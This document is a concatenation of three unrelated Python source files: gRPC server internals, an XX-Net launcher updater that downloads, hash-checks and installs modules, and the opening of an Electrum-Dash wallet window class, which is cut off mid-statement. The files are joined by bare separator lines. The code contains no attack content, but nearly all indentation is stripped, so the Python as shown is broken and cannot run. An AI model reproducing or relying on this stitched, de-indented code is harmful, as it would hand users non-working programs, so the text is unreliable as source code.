def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(
float(self._rpc_event.request_call_details.deadline) - time.time(),
0)
def cancel(self):
self._rpc_event.operation_call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return _common.application_metadata(self._rpc_event.request_metadata)
def peer(self):
return _common.decode(self._rpc_event.operation_call.peer())
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.operation_send_initial_metadata(
_common.cygrpc_metadata(initial_metadata), _EMPTY_FLAGS)
self._rpc_event.operation_call.start_server_batch(
cygrpc.Operations((operation,)),
_send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = _common.cygrpc_metadata(
trailing_metadata)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
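    # Iterator handed to stream-request handlers: each next() starts a
    # receive-message batch on the call and waits on the RPC condition for the
    # request, raising StopIteration when the client closes the stream and an
    # RpcError if the RPC is cancelled.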
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
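    # Build a thunk that receives exactly one request message for an RPC with a
    # non-streaming request; it aborts the RPC if the client closes the stream
    # without sending a message, and returns None on cancellation.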
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
start_server_batch_result = rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(state, rpc_event.operation_call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.request_call_details.method)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
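    # Invoke the application-supplied handler; unexpected exceptions are logged
    # and abort the RPC with StatusCode.unknown. Returns (result, proceed).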
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.operation_call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (cygrpc.operation_send_initial_metadata(
_common.EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations), _send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
trailing_metadata = _common.cygrpc_metadata(state.trailing_metadata)
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.operation_send_status_from_server(
trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.operation_send_initial_metadata(
_common.EMPTY_METADATA, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS))
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior, argument,
request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.stream_unary, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(
_HandlerCallDetails(
_common.decode(rpc_event.request_call_details.method),
rpc_event.request_metadata))
if method_handler is not None:
return method_handler
else:
return None
def _handle_unrecognized_method(rpc_event):
operations = (cygrpc.operation_send_initial_metadata(_common.EMPTY_METADATA,
_EMPTY_FLAGS),
cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.EMPTY_METADATA, cygrpc.StatusCode.unimplemented,
b'Method not found!', _EMPTY_FLAGS),)
rpc_state = _RPCState()
rpc_event.operation_call.start_server_batch(
operations, lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),)),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
_handle_stream_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_stream_unary(rpc_event, state, method_handler,
thread_pool)
else:
if method_handler.response_streaming:
_handle_unary_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_unary_unary(rpc_event, state, method_handler,
thread_pool)
return state
def _handle_call(rpc_event, generic_handlers, thread_pool):
if not rpc_event.success:
return None
if rpc_event.request_call_details.method is not None:
method_handler = _find_method_handler(rpc_event, generic_handlers)
if method_handler is None:
return _handle_unrecognized_method(rpc_event)
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
def __init__(self, completion_queue, server, generic_handlers, thread_pool):
self.lock = threading.Lock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _serve(state):
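    # Completion-queue drain loop: dispatches server shutdown tags, new
    # incoming calls (request_call events) and per-RPC operation completions
    # until the server has fully stopped serving.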
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
rpc_state = _handle_call(event, state.generic_handlers,
state.thread_pool)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
def __init__(self, thread_pool, generic_handlers, options):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(_common.channel_args(options))
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
thread_pool)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state,
_common.encode(address), server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
|
update.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import json
import time
import threading
import zipfile
import sys
import platform
import uuid
from distutils.version import LooseVersion
from xlog import getLogger
xlog = getLogger("launcher")
import config
import update_from_github
import urllib2
try:
reduce # Python 2
except NameError: # Python 3
from functools import reduce
update_url = "https://xxnet-update.appspot.com/update.json"
update_content = ""
update_dict = {}
new_gae_proxy_version = ""
gae_proxy_path = ""
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath(os.path.join(current_path, os.pardir))
data_root = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data'))
def get_opener():
autoproxy = '127.0.0.1:8087'
import ssl
if getattr(ssl, "create_default_context", None):
cafile = os.path.join(data_root, "gae_proxy", "CA.crt")
if not os.path.isfile(cafile):
cafile = None
context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH,
cafile=cafile)
https_handler = urllib2.HTTPSHandler(context=context)
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}), https_handler)
else:
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}))
return opener
def version_to_bin(s):
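    # Pack a dotted version string such as "3.2.1" into a single integer,
    # one byte per component (assumes each component fits in one byte), so
    # versions can be compared numerically.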
return reduce(lambda a, b: a << 8 | b, map(int, s.split(".")))
def download_file(url, file):
try:
xlog.info("download %s to %s", url, file)
opener = get_opener()
        req = opener.open(url)
CHUNK = 16 * 1024
with open(file, 'wb') as fp:
while True:
chunk = req.read(CHUNK)
if not chunk: break
fp.write(chunk)
return True
    except Exception:
xlog.info("download %s to %s fail", url, file)
return False
def sha1_file(filename):
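    # Return the SHA-1 hex digest of `filename`, read in 64 KiB blocks;
    # returns False if the file cannot be read.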
import hashlib
BLOCKSIZE = 65536
hasher = hashlib.sha1()
try:
with open(filename, 'rb') as afile:
buf = afile.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = afile.read(BLOCKSIZE)
return hasher.hexdigest()
    except Exception:
return False
def install_module(module, new_version):
import module_init
import os, subprocess, sys
current_path = os.path.dirname(os.path.abspath(__file__))
new_module_version_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, module, new_version))
# check path exist
if not os.path.isdir(new_module_version_path):
xlog.error("install module %s dir %s not exist", module, new_module_version_path)
return
# call setup.py
setup_script = os.path.join(new_module_version_path, "setup.py")
if not os.path.isfile(setup_script):
xlog.warn("update %s fail. setup script %s not exist", module, setup_script)
return
config.set(["modules", module, "current_version"], str(new_version))
config.save()
if module == "launcher":
module_init.stop_all()
import web_control
web_control.stop()
subprocess.Popen([sys.executable, setup_script], shell=False)
os._exit(0)
else:
xlog.info("Setup %s version %s ...", module, new_version)
try:
module_init.stop(module)
subprocess.call([sys.executable, setup_script], shell=False)
xlog.info("Finished new version setup.")
xlog.info("Restarting new version ...")
module_init.start(module)
except Exception as e:
xlog.error("install module %s %s fail:%s", module, new_version, e)
def download_module(module, new_version):
import os
global update_content, update_dict
current_path = os.path.dirname(os.path.abspath(__file__))
download_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, 'data', 'downloads'))
if not os.path.isdir(download_path):
os.mkdir(download_path)
try:
for source in update_dict["modules"][module]["versions"][new_version]["sources"]:
url = source["url"]
filename = module + "-" + new_version + ".zip"
file_path = os.path.join(download_path, filename)
if os.path.isfile(file_path) and sha1_file(file_path) == update_dict["modules"][module]["versions"][new_version]["sha1"]:
pass
elif not download_file(url, file_path):
xlog.warn("download %s fail", url)
continue
sha1 = sha1_file(file_path)
if update_dict["modules"][module]["versions"][new_version]["sha1"] != sha1:
xlog.warn("download %s sha1 wrong", url)
continue
module_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, module))
if not os.path.isdir(module_path):
                os.mkdir(module_path, 0o755)
version_path = os.path.join(module_path, new_version)
if os.path.isdir(version_path):
xlog.error("module dir exist:%s, download exist.", version_path)
return
with zipfile.ZipFile(file_path, "r") as dz:
dz.extractall(module_path)
import shutil
unzip_path = os.path.abspath(os.path.join(module_path, module + "-" + new_version))
tag_path = os.path.abspath(os.path.join(module_path, new_version))
shutil.move(unzip_path, tag_path)
msg = "Module %s new version %s downloaded, Install?" % (module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
data_install = "%s|%s|install" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data": data_install, "label": "Install", 'callback': general_gtk_callback},
2: {"data": data_ignore, "label": "Ignore", 'callback': general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="Install", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
if sys_tray.dialog_yes_no(msg, u"Install", None, None) == 1:
install_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
if sys_tray.presentAlert_withTitle_(msg, "Install"):
install_module(module, new_version)
else:
ignore_module(module, new_version)
else:
install_module(module, new_version)
break
except Exception as e:
xlog.warn("get gae_proxy source fail, content:%s err:%s", update_content, e)
def ignore_module(module, new_version):
config.set(["modules", module, "ignore_version"], str(new_version))
config.save()
def general_gtk_callback(widget=None, data=None):
args = data.split('|')
if len(args) != 3:
xlog.error("general_gtk_callback data:%s", data)
return
module = args[0]
new_version = args[1]
action = args[2]
if action == "download":
download_module(module, new_version)
elif action == "install":
install_module(module, new_version)
elif action == "ignore":
ignore_module(module, new_version)
def check_update():
try:
if update_from_github.update_info == "dont-check":
return
check_push_update()
update_rule = config.get(["update", "check_update"], "notice-stable")
if update_rule not in ("stable", "notice-stable", "test", "notice-test"):
return
versions = update_from_github.get_github_versions()
current_version = update_from_github.current_version()
test_version, stable_version = versions[0][1], versions[1][1]
if test_version != config.get(["update", "skip_test_version"]):
if update_rule == "notice-test":
if LooseVersion(current_version) < LooseVersion(test_version):
xlog.info("checked new test version %s", test_version)
update_from_github.update_info = '{"type":"test", "version":"%s"}' % test_version
elif update_rule == "test":
if LooseVersion(current_version) < LooseVersion(test_version):
xlog.info("update to test version %s", test_version)
update_from_github.update_version(test_version)
if stable_version != config.get(["update", "skip_stable_version"]):
if update_rule == "notice-stable":
if LooseVersion(current_version) < LooseVersion(stable_version):
xlog.info("checked new stable version %s", stable_version)
update_from_github.update_info = '{"type":"stable", "version":"%s"}' % stable_version
elif update_rule == "stable":
if LooseVersion(current_version) < LooseVersion(stable_version):
xlog.info("update to stable version %s", stable_version)
update_from_github.update_version(stable_version)
except IOError as e:
xlog.warn("check update fail:%r", e)
except Exception as e:
xlog.exception("check_update fail:%r", e)
finally:
if update_from_github.update_info == "init":
update_from_github.update_info = ""
def check_push_update():
global update_content, update_dict
try:
opener = get_opener()
req_url = update_url + "?uuid=" + get_uuid() \
+ "&version=" + update_from_github.current_version() \
+ "&platform=" + platform.platform()
try:
update_content = opener.open(req_url).read()
except Exception as e:
xlog.warn("check_update fail:%r", e)
return False
update_dict = json.loads(update_content)
return True
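        # NOTE: the `return True` above exits here, so the push-update handling
        # below is currently unreachable (dead code kept as-is).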
for module in update_dict["modules"]:
new_version = str(update_dict["modules"][module]["last_version"])
describe = update_dict["modules"][module]["versions"][new_version]["describe"]
if update_dict["modules"][module]["versions"][new_version]["notify"] != "true":
continue
if not module in config.config["modules"]:
ignore_version = 0
current_version = 0
config.config["modules"][module] = {}
config.config["modules"][module]["current_version"] = '0.0.0'
else:
current_version = config.get(["modules", module, "current_version"])
if "ignore_version" in config.config["modules"][module]:
ignore_version = config.config["modules"][module]["ignore_version"]
else:
ignore_version = current_version
if version_to_bin(new_version) <= version_to_bin(ignore_version):
continue
if version_to_bin(new_version) > version_to_bin(current_version):
xlog.info("new %s version:%s", module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
msg = "Module %s new version: %s, Download?\nNew:%s" % (module, new_version, describe)
data_download = "%s|%s|download" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data": data_download, "label": "Download", 'callback': general_gtk_callback},
2: {"data": data_ignore, "label": "Ignore", 'callback': general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="New Version", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.dialog_yes_no(msg, u"Download", None, None) == 1:
download_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.presentAlert_withTitle_(msg, "Download"):
download_module(module, new_version)
else:
ignore_module(module, new_version)
else:
download_module(module, new_version)
except Exception as e:
xlog.exception("check_update except:%s", e)
return
def create_desktop_shortcut():
import sys
import subprocess
work_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(work_path)
if sys.platform.startswith("linux"):
if os.getenv("DESKTOP_SESSION", "unknown") != "unknown": # make sure this is desktop linux
xxnet_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir))
cmd = 'env XXNETPATH="' + xxnet_path + '" "' + work_path + '/create_shortcut_linux.sh"'
os.system(cmd)
elif sys.platform == "win32":
# import ctypes
# msg = u"是否在桌面创建图标?"
# title = u"XX-Net 叉叉网"
#res = ctypes.windll.user32.MessageBoxW(None, msg, title, 1)
# Yes:1 No:2
#if res == 2:
# return
subprocess.call(["Wscript.exe", "//E:JScript", "create_shortcut.js"], shell=False)
def notify_install_tcpz_for_winXp():
import ctypes
ctypes.windll.user32.MessageBoxW(None, u"请使用tcp-z对 tcpip.sys 打补丁,解决链接并发限制!", u"Patch XP needed", 0)
def check_new_machine():
current_path = os.path.dirname(os.path.abspath(__file__))
if current_path != config.get(["update", "last_path"], ""):
config.set(["update", "last_path"], current_path)
config.save()
if sys.platform == "win32" and platform.release() == "XP":
notify_install_tcpz_for_winXp()
if os.getenv("XXNET_NO_MESS_SYSTEM", "0") == "0":
xlog.info("generate desktop shortcut")
create_desktop_shortcut()
def check_loop():
check_new_machine()
# wait gae_proxy to start
# update need gae_proxy as proxy
time.sleep(1)
while True:
check_update()
time.sleep(3600 * 24)
def start():
p = threading.Thread(target=check_loop)
p.setDaemon(True)
p.start()
def need_new_uuid():
if not config.get(["update", "uuid"]):
xlog.info("need_new_uuid: uuid is empty")
return True
return False
def generate_new_uuid():
xx_net_uuid = str(uuid.uuid4())
config.set(["update", "uuid"], xx_net_uuid)
xlog.info("generate uuid:%s", xx_net_uuid)
config.save()
def get_uuid():
if need_new_uuid():
generate_new_uuid()
xx_net_uuid = config.get(["update", "uuid"])
xlog.info("get uuid:%s", xx_net_uuid)
return xx_net_uuid
if __name__ == "__main__":
#get_uuid()
#check_update()
#sys_tray.serve_forever()
create_desktop_shortcut()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_dash import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_dash.plugin import run_hook
from electrum_dash.i18n import _
from electrum_dash.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate)
from electrum_dash.transaction import Transaction, TxOutput
from electrum_dash.address_synchronizer import AddTransactionException
from electrum_dash.wallet import Multisig_Wallet
from electrum_dash.base_crash_reporter import BaseCrashReporter
from electrum_dash.masternode_manager import MasternodeManager
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .installwizard import WIF_HELP_TEXT
from .masternode_dialog import MasternodeDialog
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_dash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.setObjectName("main_window_container")
self.masternode_manager = None
self.gui_object = gui_object
self.config = config = gui_object.config
self._old_excepthook = None
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros', 8))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
# Disabled until API is stable.
# tabs.addTab(self.create_proposals_tab(), _('Budget Proposals'))
tabs.setMinimumSize(1020, 500)
tabs.setObjectName("main_window_nav_bar")
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
